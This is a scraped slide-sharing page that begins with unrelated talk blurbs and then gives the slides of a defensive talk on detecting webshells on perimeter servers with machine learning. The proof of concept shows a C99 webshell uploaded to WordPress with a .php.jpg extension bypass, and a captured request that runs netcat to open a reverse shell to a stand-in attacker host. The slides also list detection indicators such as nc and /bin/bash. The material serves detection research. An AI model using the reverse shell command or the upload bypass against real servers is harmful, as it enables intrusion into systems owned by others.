As soluções da NetWitness capturam todos os dados que circulam na rede e os contextualizam, filtrando o que pode ser crítico ou não. O usuario pode ver quem está indo aonde e vendo o quê.
Presentation on STMIK Nusa Mandiri.
This talk is an insight about hacking and cyber security in general. Giving the audience the sense of security and fundamental concept of this field.
Peter Wood has worked as an ethical hacker for the past 20 years, with clients in sectors as diverse as banking, insurance, retail and manufacturing. He will describe how advanced persistent threats operate from a security intelligence perspective, based on published case studies and analysis. He will highlight APT entry points and exploitation techniques and suggest practical prevention and detection strategies.
As soluções da NetWitness capturam todos os dados que circulam na rede e os contextualizam, filtrando o que pode ser crítico ou não. O usuario pode ver quem está indo aonde e vendo o quê.
Presentation on STMIK Nusa Mandiri.
This talk is an insight about hacking and cyber security in general. Giving the audience the sense of security and fundamental concept of this field.
Peter Wood has worked as an ethical hacker for the past 20 years, with clients in sectors as diverse as banking, insurance, retail and manufacturing. He will describe how advanced persistent threats operate from a security intelligence perspective, based on published case studies and analysis. He will highlight APT entry points and exploitation techniques and suggest practical prevention and detection strategies.
In this presentation John will show how Azure Devops can be used to automate the deployment and security checks of a website in the Azure cloud. In this presentation we will go through how a variety of tools are used to gain security insights into your code and deployed environment. We will explore how this relates to the pull security left philosophy from DevSecOps. After the presentation you will have gained a good insight into all the tools you can use to improve the security of your deployed code base.
Given at TRISC 2010, Grapevine, Texas.
http://www.trisc.org/speakers/aditya_sood/#p
The talk sheds light on the new trends of web based malware. Technology and Insecurity goes hand in hand. With the advent of new attacks and techniques the distribution of malware through web has been increased tremendously. Browser based exploits mainly Internet Explorer have given a birth to new world of malware infection. The attackers spread malware elegantly by exploiting the vulnerabilities and drive by downloads. The infection strategies opted by attackers like malware distribution through IFRAME injections and Search Engine Optimization. In order to understand the intrinsic behavior of these web based malware a typical analysis is required to understand the logic concept working behind these web based malwares. It is necessary to dissect these malwares from bottom to top in order to control the devastating behavior. The talk will cover structured methodologies and demonstrate the static, dynamic and behavioral analysis of web malware including PCAP analytics. Demonstrations will prove the fact and necessity of web malware analysis.
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers Tom Eston
Over the years web services have become an integral part of web and mobile applications. From critical business applications like SAP to mobile applications used by millions, web services are becoming more of an attack vector than ever before. Unfortunately, penetration testers haven't kept up with the popularity of web services, recent advancements in web service technology, testing methodologies and tools. In fact, most of the methodologies and tools currently available either don't work properly, are poorly designed or don't fully test for real world web service vulnerabilities. In addition, environments for testing web service tools and attack techniques have been limited to home grown solutions or worse yet, production environments.
In this presentation Tom, Josh and Kevin will discuss the new security issues with web services and release an updated web service testing methodology that will be integrated into the OWASP testing guide, new Metasploit modules and exploits for attacking web services and a open source vulnerable web service for the Samurai-WTF (Web Testing Framework) that can be used by penetration testers to test web service attack tools and techniques.
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
Slides from "Web Applications Automated Security Testing in a Continuous Delivery Pipeline" workshop, made during Drupal Developers Days 2017 at Seville, Spain
You have spent a ton of money on your security infrastructure. But how do you string all those things together so you can achieve your goals of reducing time to response, detecting, preventing threats. And most importantly, having your security team serve your business and mission. Learn how to organize your security resources to get the best benefit. See a live demonstration of operationalizing those resources so your security teams can do more for your organization.
SPEAKERS
Phil Royer, Research Engineer, Splunk
Rod Soto, Principal Security Research Engineer, Splunk
Obtaining data to develop defenses against threats is a constant challenge for security analysts. To that end, Splunk's Security Research team developed the Splunk SIEMulator, a framework modeled after Chris Long's DetectionLab that allows a...
In this presentation John will show how Azure Devops can be used to automate the deployment and security checks of a website in the Azure cloud. In this presentation we will go through how a variety of tools are used to gain security insights into your code and deployed environment. We will explore how this relates to the pull security left philosophy from DevSecOps. After the presentation you will have gained a good insight into all the tools you can use to improve the security of your deployed code base.
Given at TRISC 2010, Grapevine, Texas.
http://www.trisc.org/speakers/aditya_sood/#p
The talk sheds light on the new trends of web based malware. Technology and Insecurity goes hand in hand. With the advent of new attacks and techniques the distribution of malware through web has been increased tremendously. Browser based exploits mainly Internet Explorer have given a birth to new world of malware infection. The attackers spread malware elegantly by exploiting the vulnerabilities and drive by downloads. The infection strategies opted by attackers like malware distribution through IFRAME injections and Search Engine Optimization. In order to understand the intrinsic behavior of these web based malware a typical analysis is required to understand the logic concept working behind these web based malwares. It is necessary to dissect these malwares from bottom to top in order to control the devastating behavior. The talk will cover structured methodologies and demonstrate the static, dynamic and behavioral analysis of web malware including PCAP analytics. Demonstrations will prove the fact and necessity of web malware analysis.
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers Tom Eston
Over the years web services have become an integral part of web and mobile applications. From critical business applications like SAP to mobile applications used by millions, web services are becoming more of an attack vector than ever before. Unfortunately, penetration testers haven't kept up with the popularity of web services, recent advancements in web service technology, testing methodologies and tools. In fact, most of the methodologies and tools currently available either don't work properly, are poorly designed or don't fully test for real world web service vulnerabilities. In addition, environments for testing web service tools and attack techniques have been limited to home grown solutions or worse yet, production environments.
In this presentation Tom, Josh and Kevin will discuss the new security issues with web services and release an updated web service testing methodology that will be integrated into the OWASP testing guide, new Metasploit modules and exploits for attacking web services and a open source vulnerable web service for the Samurai-WTF (Web Testing Framework) that can be used by penetration testers to test web service attack tools and techniques.
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
Slides from "Web Applications Automated Security Testing in a Continuous Delivery Pipeline" workshop, made during Drupal Developers Days 2017 at Seville, Spain
You have spent a ton of money on your security infrastructure. But how do you string all those things together so you can achieve your goals of reducing time to response, detecting, preventing threats. And most importantly, having your security team serve your business and mission. Learn how to organize your security resources to get the best benefit. See a live demonstration of operationalizing those resources so your security teams can do more for your organization.
SPEAKERS
Phil Royer, Research Engineer, Splunk
Rod Soto, Principal Security Research Engineer, Splunk
Obtaining data to develop defenses against threats is a constant challenge for security analysts. To that end, Splunk's Security Research team developed the Splunk SIEMulator, a framework modeled after Chris Long's DetectionLab that allows a...
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
Detection of webshells in compromised perimeter assets using ML algorithms
1. Detecting Webshells in Compromised
Perimeter Assets Using ML Algorithms
Rod Soto @rodsoto
Joseph Zadeh @josephzadeh
2. $Whoami
Rod Soto has over 15 years of experience in information technology and security. He is a security researcher and secretary
of the board of Hackmiami %27.He has spoken at ISSA, ISC2, OWASP, DEFCON, BlackHat, RSA, Hackmiami, Bsides
and also been featured in Rolling Stone Magazine, Pentest Magazine, Univision and CNN. Rod Soto was the winner of the
2012 BlackHat Las vegas CTF competition and is the founder and lead developer of the Kommand && KonTroll competitive
hacking Tournament series.
Joseph Zadeh studied mathematics in college and received a BS from University California, Riverside and an MS and PhD
from Purdue University. While in college, he worked in a Network Operation Center focused on security and network
performance baselines and during that time he spoke at DEFCON and Torcon security conferences. Most recently he joined
Caspida as a security data scientist. Previously, Joseph was part of the data science consulting team at Greenplum/Pivotal
helping focused on Cyber Security analytics and also part of Kaiser Permanentes first Cyber Security R&D team.
4. The Perimeter
A network perimeter is the boundary between
the private and locally managed-and-owned side
of a network and the public and usually provider-
managed side of a network.*
5. What Are Perimeter Assets?
Perimeter assets are those infrastructure, application items that are exposed on
the internet or WAN. This may include:
- Routers
- IoTs (Cameras, RF,
- Firewalls/IDS/Load Balancers
- Servers (HTTP, DNS, IMAP, SMTP, SSH, VPN, etc)
- Yes… Cloud assets are also part of perimeter as long as they have a link,
connection, shared credentials or access from within the organization.
6. Perimeter Assets: First Line Of Defense
Logically perimeter assets are the first line of defense.
- Constantly under attack
- Vulnerable to unknown/0 days (I.E Heartbleed, Shellshock)
- Defenders must constantly monitor, update, patch
- Rely heavily on static signature technology, this technology is reactive,
passive
- 3rd party risks (Forgotten/Shared/Collocated, Unpatched, Unsecured APIs)
7. Perimeter Assets Can Become Unexpected Back
doors
Or more like a front door.... As they are exposed to the entire world, it is possible
to begin a campaign by attacking network perimeter assets and from there get
your way into the organization.
Consider this… Most organizations nowadays only expose 80 or 443, so it is
logical that web servers are prime targets as well as other internet delivered
services such as: MAIL, CMS, CRM, Dev, Storage, etc.
8. Do you think they might use same credentials
internally? Maybe mail clients? Storage?
9. Why Use A Webshell
- Stealth, compact multi functional tool
- Leverage the programming language used in
the web applications (PHP, JAVA, ASP, etc)
- Obfuscate commands appearing “web traffic”
- Covert channel using SSL/TLS
11. What Is A Webshell
“A web shell is a script that can be uploaded to a
web server to enable remote administration of
the machine. Infected web servers can be either
Internet-facing or internal to the network, where
the web shell is used to pivot further to internal
hosts.” US CERT
14. Some Examples Of Webshells
- C99, C100
- R57
- PhpJackal (evades AV)
- Soldier of Allah (Al-qaeda webshell)
- Weevely (Terminal like webshell,
very effective, small footprint)
- AspxSpy
- WSO (Web Shell by Orb)
- China Chopper (Has thick client)
- JspWebshell
- rootshell
15. Common Functions Of Webshells
- Authentication
- Remote administration / C2
- File management (View, Copy, Move, Upload, Download)
- Database management/connection
- Command Shell (ls, pwd, nc, cat, etc)
- Entrenchment (create persistence via new mechanisms like NC, Python,Perl)
- Encoding/Encryption
16. Webshells Can Provide Further Access
- Many times attacker will place webshell then proceed to further access. Some
common next steps are:
- Stealing credentials
- Capturing traffic (Stats, behavior, protocols, etc)
- Footprinting internal network
- Local root/system exploits
17. How Are These Webshells Delivered?
Web shells can be delivered through a number of web application exploits or
configuration weaknesses including:
Cross-Site Scripting;
SQL Injection;
Vulnerabilities in applications/services (e.g., WordPress or other CMS
applications);
File processing vulnerabilities (e.g., upload filtering or assigned permissions);
Remote File Include (RFI) and Local File Include (LFI) vulnerabilities;
Exposed Admin Interfaces (possible areas to find vulnerabilities mentioned
above). *US Cert
18. Example Of An Exploit Campaign Using Webshell
Delivery of SamSam ransomware (2016)
- Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-4810) at exposed web server.
- Upload webshell ( jbossinvoker, zecmd, cmd, etc)
- JBoss running high on privs? No problem
- JBoss with low privs, upload local root/system exploit
- Windows box? upload PSexec (Powershell now works on *nix as well)
- Distribute ransomware (SamSam), Run MimiKatz? (PTH,PTT)
20. Layered ML
20
● Shades of Grey
– The layered security approach fuses multiple pieces of evidence together using a combination of models rules and
statistics to move past the traditional detection solutions
● Sequencing Security Behaviors
– The next generation SIEM indexes all outputs and outcomes and uses rules, statistics, IOC’s and intelligence along
with the fusion of ML models to build a central nervous system view of all possible risks in an environment
● Evidence Fusion: Overlay risk categories on top of each system in the
environment
– Defense Science Board, Resilient Military Systems and the Advanced Cyber Threat (Jan. 2013)
21. Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-
4810) at exposed web server
ML Security Use Cases
Exploit chain model analyzes new traffic for 0-days and
deliveries of malicious payload
(https://github.com/jzadeh/Aktaion)
Use Case: Webshell on DMZ Asset ML Evidence Fusion
22. Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-
4810) at exposed web server
Attacker uploads lightweight webshell on compromised
server ( jbossinvoker, zecmd, cmd, etc)
ML Security Use Cases
Exploit chain model analyzes new traffic for 0-days and
deliveries of malicious payload
(https://github.com/jzadeh/Aktaion)
Asset discovery model monitors for changes in the asset
graph and dynamically detects assets acting out of
band from their peer group
Use Case: Webshell on DMZ Asset ML Evidence Fusion
23. Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-
4810) at exposed web server
Attacker uploads lightweight webshell on compromised
server ( jbossinvoker, zecmd, cmd, etc)
Beachhead established and trust relationship exploited
from DMZ to LAN asset using in memory malware
ML Security Use Cases
Exploit chain model analyzes new traffic for 0-days and
deliveries of malicious payload
(https://github.com/jzadeh/Aktaion)
Asset discovery model monitors for changes in the asset
graph and dynamically detects assets acting out of
band from their peer group
Beacon model analyzes communication for C2 patterns
even when asynchronous or over small periods of
activity
Use Case: Webshell on DMZ Asset ML Evidence Fusion
24. Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-
4810) at exposed web server
Attacker uploads lightweight webshell on compromised
server ( jbossinvoker, zecmd, cmd, etc)
Beachhead established and trust relationship exploited
from DMZ to LAN asset using in memory malware
Domain Controller is attacked and LDAP directory and
credential hashes exfiltrated
ML Security Use Cases
Exploit chain model analyzes new traffic for 0-days and
deliveries of malicious payload
(https://github.com/jzadeh/Aktaion)
Asset discovery model monitors for changes in the asset
graph and dynamically detects assets acting out of
band from their peer group
Beacon model analyzes communication for C2 patterns
even when asynchronous or over small periods of
activity
AD Tree model detects admin credentials performing out
of band sequence of behavior
Use Case: Webshell on DMZ Asset ML Evidence Fusion
29. Detecting Webshells With ML: References
• https://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/
• Going beyond the Indicator: https://vimeo.com/90687936
• Xin Sun, Xindai Lu, and Hua Dai. 2017. A Matrix Decomposition based Webshell Detection
Method. In Proceedings of the 2017 International Conference on Cryptography, Security and
Privacy(ICCSP '17). ACM, New York, NY, USA, 66-70. DOI:
https://doi.org/10.1145/3058060.3058083
• Ye Fei; Gong Jian; Yang Wang; Black Box Detection of Webshell Based on Support Vector
Machine School of Computer Science and Technology, Southeast University; Key Laboratory
of Computer Network Technology of Jiangsu Province:
http://en.cnki.com.cn/Article_en/CJFDTotal-NJHK201506020.htm
32. How do we Detect Webshells Using ML
• New approaches in machine learning and data science can help improve detection of compromised
perimeter assets.
• Two Models of Webserver Behavior: Global Asset Behavior and Local Webserver Content Behavior
(Dynamic + Static Content)
• Local Feature Vector Answers Questions Like: How many times do users take a similar path on
the webserver? How rare is this path a user is browsing from a statistics perspective?
• Global Feature Vector Answers Questions Like: How often does this webserver communicate with
DMZ IP’s? Is there a trust relationship that has changed?
35. How do we Detect Webshells Using ML: Global Stats
Anomalies on rare paths
U->S
S->U !!
U->U (LAN to LAN)
S->S (DMZ to LAN)!!
Desktop Server Desktop Laptop
LAN AssetDMZ Server
38. Seeing the Analytic In Action
Once identity resolution/learning process is complete we
create new anomalies based on new paths/actions that are
rare for a particular population profile
Lightweight Webshell
in the DMZ
39. How do we detect Webshells using ML...
Based on these indicators we look for sequential behaviors. For example we can
look at sequence of requests for a fixed (IP/User, Web server). We can use bro
logs, web server logs and perimeter traffic as well as long as we have visibility into
the application layer.
By determining these sequences we can discern between benign behavior and
sequences of behaviors that indicate webshell like activity.
41. How do we Detect Webshells Using ML: Local Stats
Using Machine Learning techniques we can compute and build up statistics around some key data points.
In the context of this particular vector we can use rare means/ low frequency count for a fixed website:
- Rare time of site usage,
- Rare time stamping and creation of files,
- Rare connection pat- terns, Large number of POST/GET Requests to specific file,
- Connection strings with command arguments (cmd.exe, /bin/bash, nc),
- Unusual Direct connections to files exposed to the internet,
- Unusual UA in comparison to normal traffic patterns when users, visit website or search,
engine indexing site.
42. Webshell detection POC/Example
For proof of concept we gather data of benign and normal browsing behavior and
then we proceeded to replicate a RFI (Remote File Inclusion) uploading a C99
webshell to target host. In this particular sequence of referrer items it can be seen
how the attacker is browsing around the site possibly foot printing and searching
for input fields.
43. Webshell detection POC/Example
Referrer sample sequence below shows browsing around victim web site:
-Referer: http://victimdomain/wordpress/?p=9
-Referer: http://victimdomain/wordpress/wp-content/themes/default/style.css
-Referer: http://victimdomain/wordpress/wp-content/plugins/category-grid-view-
gallery/css/style.css?ver=2.8.5
Further review of referrers show access to wordpress:
Referer: http://victimdomain/wordpress/wp-login.php
Referer: http://vicitimdomain/wordpress/wp-admin/
44. Webshell POC/Example
The following sequence shows the attacker accessing the post feature and
uploading a C99 shell bypassing sanitation controls by adding a .jpg extension to
the actual shell “c9920161.php”. This is done by abusing the new post feature that
includes uploading media:
00:28:39.469021 IP attackerIP.51399 > victimdomain.80:
Flags [P.], seq 13419:14264, ack 145980, win 4096,
options [nop,nop,TS val 787343940 ecr 195280],
length 845: HTTP: GET /wordpress/wp-content/plugins
/a-gallery/timthumb.php?src=http://victimdomain/
wordpress/wp-content/uploads/2016/06/c992016.php.
jpg&w=125&h=125&zc=1 HTTP/1.1...D....GET /wordpress
/wp-content/plugins/a-gallery/timthumb.php?src=http
://victimdomain/wordpress/wp-content/uploads
/2016/06/c9920161.php.jpg&w=125&h=125&zc=1 HTTP/1.1
45. Webshell detection POC/Example
Referrer: http://victimdomain/wordpress/wp-admin/post-new.php (Here is where
the web shell is uploaded)
Finally, by looking at the example for referrer sequences it can be seen how by
the attacker browsing to the web shell, frequency of access indicates a signal for
operator behavior in the sequential component of the TTP:
Referer: http://victimdomain/wordpress/?p=13
Referer: http://victimdomain/wordpress/wp-content/ uploads/
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/
Referer:http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
46. Webshell detection POC/Example
In the following packet capture snippet it can be seen how attacker uses netcat to send a reverse shell
utilizing C99 command execution feature:
00:33:26.996555 IP attackerIP.51421 > victimdomain.80:
Flags [P.], seq 0:1014, ack 1, win 4117, options [nop,nop,TS val 787630908 ecr 267163], length 1014:
HTTP: POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg HTTP/1.1E..*..@.@......q.......P
.....U......%........K<....POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_c8c9d8ea3e0f27d770e745c21c00f45e
=test%7C1465100854%7Cd83074c4a4a1c097c4eb44b42165d190; wp-settings-time-2=1464928107; PHPSESSID=
cav3sgkd273gafknm9pb13m467act=cmd&cmd=nc+-e+%2Fbin%2Fbash+attackerIP+9999&d=%2Fvar%2Fwww%2
Fwordpress%2Fwp-content%2Fuploads%2F2016%2F06%2F&submit=Execute&cmd_txt=1
48. Effective Webshell detection via machine Learning
• Webshell ML Detection Paradigm
• Two models of Behavior: Local behavior and Global Asset Behavior
• Local behavior is further broken down into individual history per path in a
Webserver. The webserver model is maintained as two separate individual
graphs one for dynamic content and one for static content
• Feature Vectors for the local content and path anomalies on a per webserver
basis are then correlated with global asset path behaviors.
49. Conclusion
- Machine Learning & Big data technologies enhance detection beyond the
simple static based signature defense technologies.
- It is possible to establish sequences of behaviors that indicate webshell
access and use.
- The data is already there. You can use your perimeter logs (Proxy, Firewalls,
Bro, Web Gateway, etc).
- Detection mechanisms can also be enhanced and extended by covering any
other measurable attack vector that delivers a web shell payload (SQli, XSS,
other types of RFI, etc).
55. Step 3: Decompose the problem into two types of computation
Arbitrary User Behavior = Sequential Component + “Un-
Ordered” Component
56. Step 3: Decompose the problem into two types of computation
Arbitrary User Behavior = Sequential Component + “Un-
Ordered” Component
Examples
Sequential Behaviors
1. Exploit Chains
2. Timing Analysis (Periodicity)
3. Active Directory Sequence
4. Authentication Graph
Non Sequential Behaviors
1. Fingerprinting
2. Grouping Behaviors
3. Application Counts
4. Rare file extension counts for Webshell detection
57. Step 3: Decompose the problem into two types of computation
Arbitrary User Behavior = Sequential Component + “Un-
Ordered” Component
Mapping Behaviors to Computational Paths
Easy to Parallelize
1. Count()
2. Average()
3. Time series()
4. Local state computations
Per user/IP/account/…
Hard to Parallelize (NC Complete Complexity)
1. Rank()
2. Median
3. Anything that keeps track of globalstate
4. Machine Learning Computations
58. Step 4: Build an ML Model for each important sub-behavior
59. Step 4: Build an ML Model for each important sub-behavior
Each Model can be batch, real-time or hybrid mode
61. Step 5: Operationalize the Model Life Cycle
How do we programmatically learn new patterns over time?
62. Step 5: Operationalize the Model Life Cycle
How do we programmatically learn new patterns over time?
When is an ML model Ready
1. When should we re-train?
2. How should new data weighted over old data?
3. How do we know when a model is ready?
63. Step 5: Operationalize the Model Life Cycle
How do we programmatically learn new patterns over time?
When is an ML model Ready
1. When should we re-train?
2. How should new data weighted over old data?
3. How do we know when a model is ready?
64. Step 5: Operationalize the Model Life Cycle
How do we programmatically learn new patterns over time?
When is an ML model Ready
1. When should we re-train?
2. How should new data weighted over old data?
3. How do we know when a model is ready?
66. 67
DHCP
IMS/IPA
M
FW
Prox
yVPN
AD
Real Time Identity Resolution
Distributed
ETL
Username = select
coallesce(user_na
me, hostname, IP)
from
Active_ID_Table
where IP =
‘10.10.100.23)
IP DHCP.MAC DHCP_Lasteventtime AD_FQDN
10.100.1.23 58:5c:35:c3:6e:a4 2014-03-11T14:00:00 joe.eng.acme.com
10.13.11.221 12:3a:74:b2:6a:22 2014-03-12T14:30:00 ad.hr.acme.com
Sequential
Models and
IOC’s
Data
Ingest
Large Scale Models
and Non-Sequential
IOC’s
Real Time
Layer
Batch
Layer
Hybrid
View
(Batch +
Real
Time)
Editor's Notes
Context: shades of grey is a good thing. People in security tend to think black and right -> rules are brittle.
Shades of grey is good: Machine Learning
Defend as
Layered security strategy
Examples of where certain kindfs of behavior wont confirm to a rule. How sequencing a bunch of small indicators and
Evidence from small hetergenous:
Black and white is good -> you are not transacting in blackh
Rules
Stastistics
Humans
Simple question I use to assess the security posture of large enterprises hwo easy can they answer this question: ”For every network request in our network can we determine the individual process on the host that generated the request”
Evidence from small hetergenous:
100 files -> is not bad because it has not triggered the 10GB rule yet
Peer group -> never moves more than 10 files
Vpn sesion -> comes from a small geolocation
Weaving a whole story based on the
Black and white is good -> you are not transacting in blackh
Evidence from small hetergenous:
100 files -> is not bad because it has not triggered the 10GB rule yet
Peer group -> never moves more than 10 files
Vpn sesion -> comes from a small geolocation
Weaving a whole story based on the
Black and white is good -> you are not transacting in blackh
Evidence from small hetergenous:
100 files -> is not bad because it has not triggered the 10GB rule yet
Peer group -> never moves more than 10 files
Vpn sesion -> comes from a small geolocation
Weaving a whole story based on the
Black and white is good -> you are not transacting in blackh
Evidence from small hetergenous:
100 files -> is not bad because it has not triggered the 10GB rule yet
Peer group -> never moves more than 10 files
Vpn sesion -> comes from a small geolocation
Weaving a whole story based on the
Black and white is good -> you are not transacting in blackh
Evidence from small hetergenous:
100 files -> is not bad because it has not triggered the 10GB rule yet
Peer group -> never moves more than 10 files
Vpn sesion -> comes from a small geolocation
Weaving a whole story based on the
Black and white is good -> you are not transacting in blackh